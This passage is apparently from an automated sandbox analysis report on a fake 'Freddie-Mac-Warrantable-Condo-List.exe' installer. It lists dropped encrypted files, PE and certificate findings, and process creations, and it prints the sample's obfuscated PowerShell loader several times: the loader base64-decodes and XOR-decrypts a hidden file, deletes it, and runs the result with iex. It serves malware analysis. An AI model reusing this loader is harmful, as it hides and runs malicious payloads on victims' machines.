Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OjxTYdNhPtzpSgH.OXBIvVzLfZlNCurHkGM entropy: 7.99712500547	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rcWsflZHpJ.nyVPuodLUXIFhrlW entropy: 7.99724023189	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\oOSFugyTDUAbH.sxDypWYeKAlmgtLhk entropy: 7.99900510758	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\xCvNDnGRtkyP.oBUdfHMyXIEs entropy: 7.99858431238	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yEeiKNMUkJ.hZHKCIGlTpYs entropy: 7.99837110121	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\pvwILGNdhfH.wQHRysbFJg entropy: 7.99843019628	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\TUqOaEPgceRuN.dfnvcUCjMN entropy: 7.99869733906	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ZukmylncoUEYz.UjMcVzBOgi entropy: 7.9962297799	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\jAelrPOcypkTZfVtKq.bzurWBenlEjhHI entropy: 7.9974233036	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tYRpUHVraXAkgZdPe.BiHbIpfJXdEFx entropy: 7.99850985942	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\xCLKPhnZkDmIvTO.WQgcTXVIbSxFjhin entropy: 7.99753708775	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\QFrtBRTzCJSbDqXfcUa.fxcqoAIKPdRJepOZDm entropy: 7.99896084986	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yXfaYDtbSgRH.zhCOJToUEjcYLaPi entropy: 7.99754618442	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nkpDhrIiVQMtPH.cHkKZLGBSMs entropy: 7.99862747347	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YpnUfdkcRolHPbQxM.ZfKtrwVIMP entropy: 7.99847122555	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gIULYZbAhBmOFcf.faUVqPkpOHEKeid entropy: 7.99682323591	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\iNjusWYLgHQSK.NvGTqDQOFZABdkCho entropy: 7.99864655822	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vcxCqPUsNdjILkz.GgEqsLRmAHuC entropy: 7.9985306607	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\WufnsLQMUK.wZvnTjDVKFmGRqWpg entropy: 7.99668509073	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vTgAziQfESIk.jegVNzmiKyCGMbOp entropy: 7.99740588017	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vtUZAcdmexnYDFaRj.kRJgKncFuMaIPXeDWo entropy: 7.99888601436	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nkGwMfFOLpJmPKj.bamptKqfLORC entropy: 7.99840858147	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XiOQFzbuYefZDVyEG.XWUgcbExsqzmlNe entropy: 7.99897276857	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\caGzUClXse.IuDdnYoptXbJyhf entropy: 7.99834126369	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\OuydComPSsJI.VQUxYTScfjGAeOHMnz entropy: 7.99735142997	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UXAKdMsStjxqIEF.NBUnYIHlWwxGOkc entropy: 7.99776232973	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EcPUeYKRrDmdQI.CfvIrSklDqxVipyd entropy: 7.99814892867	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\cdDHFXorBVjRQufes.iFKuNjmeoTJXxMGS entropy: 7.99832835179	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\LRdKFotHgYCGbDOxhpB.mLYxMsEBPbGcaHqO entropy: 7.9986416956	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\SePJsnlDXipVQhubE.RNmACDSdYevk entropy: 7.99647279832	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XAKtwqoYDBQkIi.erSGZvdBYJCUbMDco entropy: 7.99897469073	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UAwDrBfIaMbqHGjx.vcCtaQnOSXrNiP entropy: 7.99898618751	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\PIEKOXUhAYBg.qDBzpfyHPbGNvkR entropy: 7.99786179967	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\HbLwQzMyShrm.HYRjDAQCbsWSOvfMZpP entropy: 7.99904800778	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vcXEMslgBxyqCDi.yUtLlDFGzXnIY entropy: 7.99818662116	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\AjBICNDlUaPKYotmuz.DLlSIFYzMVGyfOxsNa entropy: 7.9987040828	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rYBPRADkMLU.kPlZocvTwiNBDjyLr entropy: 7.99798821878	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VmsfSCGRlMwvNaAPK.SCBkWQIoFxTbZKcDYPE entropy: 7.99854685859	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\EyhsCdbWfzNovaulc.EbSmYdQTBR entropy: 7.99900705419	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\QhaeOorIzFxLByVc.AUEiDmCSpjgvQaTk entropy: 7.99901457614	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\cgrdPeqIJGKDbtVT.UrDoOJXSFjNAw entropy: 7.99875226906	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yqkPMnCBgZEtKNlp.hCKVUTmsSEOodeJwj entropy: 7.99911354567	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YZcRxjIrpNOo.NCWqpHdozbnTeyus entropy: 7.99856320708	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\zRavsAMIod.XEeGAaZSjKJLgPsYnf entropy: 7.99901151637	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\KPxVMuHgwsqlmaQyjLc.DwXVlceiuQEGvn entropy: 7.99844841546	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\UwISFRNoVkExWOPpG.bzGtJXfZHKqsRIPODvl entropy: 7.99904000873	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gFzDjOEGlsCdY.hWVZaMxwgeBEyrPsb entropy: 7.99877793668	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GWilEVmdoMex.ahWYZtVgFDrdsqAcmK entropy: 7.9970485872	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\aInGvrfePdzW.gvRWLzkVxphXGPrSBFI entropy: 7.99887230733	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tBYGhoHrEVXlsUxcRz.GKesNkcIQFOCJ entropy: 7.99800672076	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XHeGYqQOVarfmtS.fIYAMdmsCiJE entropy: 7.99859161598	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nYDKWzcTsrJBCR.kCEpvMLRXgUJSo entropy: 7.99870142826	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\NBFnbsgCel.IoifTQsUFvjc entropy: 7.99754540806	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\GXczwBDkjLlVn.tUMAfbdjGKYRez entropy: 7.99884135338	Jump to dropped file

System Summary:

Source: Freddie-Mac-Warrantable-Condo-List.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_004AF110
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		5_2_0060F6D8

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004323DC	1_2_004323DC
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_004255DC	1_2_004255DC
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0040E9C4	1_2_0040E9C4
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_006B786C	5_2_006B786C
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0040C938	5_2_0040C938
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08265978	10_2_08265978
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08267A00	10_2_08267A00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08265248	10_2_08265248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08262248	10_2_08262248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_082612E8	10_2_082612E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0826BD40	10_2_0826BD40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08268E08	10_2_08268E08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0826A728	10_2_0826A728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_08263FB8	10_2_08263FB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_0826AFE8	10_2_0826AFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07BB8EE0	11_2_07BB8EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07BB8EE0	11_2_07BB8EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FB22F0	11_2_07FB22F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FBB0A0	11_2_07FBB0A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FBBE08	11_2_07FBBE08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FCB748	11_2_07FCB748
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FC1267	11_2_07FC1267
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FCCA30	11_2_07FCCA30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FC2900	11_2_07FC2900
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FC7808	11_2_07FC7808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FCD4F8	11_2_07FCD4F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FC0E62	11_2_07FC0E62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FCBD88	11_2_07FCBD88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FCDB08	11_2_07FCDB08
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FC2900	11_2_07FC2900
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FCDA39	11_2_07FCDA39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_08055E70	11_2_08055E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_080554A8	11_2_080554A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07FC7801	11_2_07FC7801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07BBE288	11_2_07BBE288
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07BB0040	11_2_07BB0040

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: String function: 005F5C7C appears 50 times
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: String function: 005F5F60 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: String function: 005DE888 appears 40 times

Source: Freddie-Mac-Warrantable-Condo-List.tmp.1.dr

Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000003.255111347.000000007FB50000.00000004.00000001.sdmp	Binary or memory string: OriginalFileName vs Freddie-Mac-Warrantable-Condo-List.exe
Source: Freddie-Mac-Warrantable-Condo-List.exe, 00000001.00000003.380933072.0000000002358000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs Freddie-Mac-Warrantable-Condo-List.exe

Source: Freddie-Mac-Warrantable-Condo-List.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Freddie-Mac-Warrantable-Condo-List.tmp.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Freddie-Mac-Warrantable-Condo-List.tmp.1.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Freddie-Mac-Warrantable-Condo-List.exe

Static PE information: invalid certificate

Source: Freddie-Mac-Warrantable-Condo-List.exe

Virustotal: Detection: 15%

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

File read: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe 'C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe'
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Process created: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp 'C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp' /SL5='$90236,102634141,825344,C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\AppData\Roaming\9be9c1fdc2ac2d166cecc3e07168fbee.pdf'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge 